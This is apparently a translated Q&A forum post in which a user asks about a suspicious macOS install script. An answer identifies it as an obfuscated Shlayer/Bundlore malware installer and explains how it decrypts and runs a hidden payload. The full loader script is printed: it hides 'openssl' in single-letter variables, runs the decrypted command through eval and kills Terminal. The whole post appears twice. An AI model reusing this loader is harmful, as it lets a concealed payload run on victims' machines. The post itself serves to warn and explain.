这个命令有多有害?
How harmful is this command?
#!/bin/bash
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s";
export appDir=$(cd "$(dirname "[=10=]")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal
我是从一个自动下载的可疑 install.dmg 文件中得到的。我显然没有 运行 这个所以我想我可以在这里问问你们。
简短回答:不要 运行。用火杀死它,除非你有兴趣将其分析为恶意软件。
这是一个混淆的恶意软件安装程序脚本。该脚本本身非常通用,但在同一目录中还有另一个(加密的)文件才是真正的有效载荷,而且几乎可以肯定它是恶意软件。事实上,这看起来与我刚才看过的几乎完全匹配。 Here's the VirusTotal scan results for that one, which suggests it's the Bundlore adware collection. This CrowdStrike blog post 将其标识为 Shlayer,并同意 payload 为 Bundlore。
说明:如果这与我之前查看的匹配,则该脚本旁边还有另一个名为“2P1zsqQ”的文件。该文件名用作将 commandArgs 字符串解密为 shell 命令字符串的密码,该命令字符串具有将 2P1zsqQ 文件本身(使用相同的密码)解密为 /tmp/<somethingrandom>/Qqsz1P2、运行 那个(解密的)可执行文件,然后删除它(虽然这个脚本会杀死终端应用程序,从而隐藏正在发生的事情)。
顺便说一句,this question 是关于一个类似的恶意软件安装程序脚本;可能是混淆程度稍低的早期版本。
#!/bin/bash
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s";
export appDir=$(cd "$(dirname "[=10=]")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal
我是从一个自动下载的可疑 install.dmg 文件中得到的。我显然没有 运行 这个所以我想我可以在这里问问你们。
简短回答:不要 运行。用火杀死它,除非你有兴趣将其分析为恶意软件。
这是一个混淆的恶意软件安装程序脚本。该脚本本身非常通用,但在同一目录中还有另一个(加密的)文件才是真正的有效载荷,而且几乎可以肯定它是恶意软件。事实上,这看起来与我刚才看过的几乎完全匹配。 Here's the VirusTotal scan results for that one, which suggests it's the Bundlore adware collection. This CrowdStrike blog post 将其标识为 Shlayer,并同意 payload 为 Bundlore。
说明:如果这与我之前查看的匹配,则该脚本旁边还有另一个名为“2P1zsqQ”的文件。该文件名用作将 commandArgs 字符串解密为 shell 命令字符串的密码,该命令字符串具有将 2P1zsqQ 文件本身(使用相同的密码)解密为 /tmp/<somethingrandom>/Qqsz1P2、运行 那个(解密的)可执行文件,然后删除它(虽然这个脚本会杀死终端应用程序,从而隐藏正在发生的事情)。
顺便说一句,this question 是关于一个类似的恶意软件安装程序脚本;可能是混淆程度稍低的早期版本。